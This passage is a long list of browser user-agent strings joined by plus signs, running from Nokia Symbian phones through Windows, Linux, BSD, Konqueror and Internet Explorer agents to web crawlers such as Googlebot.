AppleWebKit/536.2+ (KHTML like Gecko) Version/7.2.1.0 Safari/536.2+ +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba +Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 +Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65 +Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 +Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0 +Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 +Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525 +Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2 +Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 +Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.29 Safari/537.36 OPR/15.0.1147.24 (Edition Next) +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML like Gecko) Maxthon/4.0.0.2000 Chrome/22.0.1229.79 Safari/537.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.12 Safari/537.36 OPR/14.0.1116.4 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36 OPR/19.0.1326.56 +Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20120422 Firefox/12.0 SeaMonkey/2.9 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 +Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0) Gecko/16.0 Firefox/16.0 +Mozilla/5.0 (Windows NT 6.2; rv:19.0) Gecko/20121129 Firefox/19.0 +Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0 +Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36 OPR/18.0.1284.49 +Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0 +Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax) +Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2 +Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; BOLT/2.800) AppleWebKit/534.6 (KHTML, like Gecko) Version/5.0 Safari/534.6.3 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18 +Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 +Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E) +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9 +Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 +Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: ) +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 +Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 +Mozilla/5.0 (Windows; U; Windows NT 6.2; es-US ) AppleWebKit/540.0 (KHTML like Gecko) Version/6.0 Safari/8900.00 +Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a +Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 +Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/536.5 (KHTML like Gecko) Chrome/19.0.1084.56 Safari/536.5 +Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 +Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8 +Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36 +Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 +Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 +Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20120502 Firefox/12.0 SeaMonkey/2.9.1 +Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1 +Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 +Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre +Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (X11; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0 +Mozilla/5.0 (X11; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 +Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0 +Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0 +Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2 +Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.166 Safari/537.36 OPR/20.0.1396.73172 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.56 Safari/537.4 +Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre +Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 +Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20120724 Debian Iceweasel/15.02 +Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2 +Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 +Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre +Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0 +Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1 +Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9 +Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 +Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 +Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15 +Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 +Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko +Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025 +Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1 +Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020 +Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu) +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8 +Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2) +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2 +Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330 +Mozilla/5.0 (X11; U; Linux i686; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.0.5603M +Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher +Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox) +Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 +Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0 +Mozilla/5.0 (X11; U; Linux i686; rv:19.0) Gecko/20100101 Slackware/13 Firefox/19.0 +Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5) +Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT +Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 +Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1) +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5 +Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9 +Mozilla/5.0 (X11; U; Linux x86_64; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AP +Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT +Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT +Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12 +Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0 +Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5 +Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14 +Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15 +Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3 +Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8 +Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3 +Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0 +Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) +Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11; +Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1) +Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu) +Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0 +Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11 +Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu +Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu +Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12 +Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko) +Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) +Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) +Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) +Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) +Mozilla/5.0 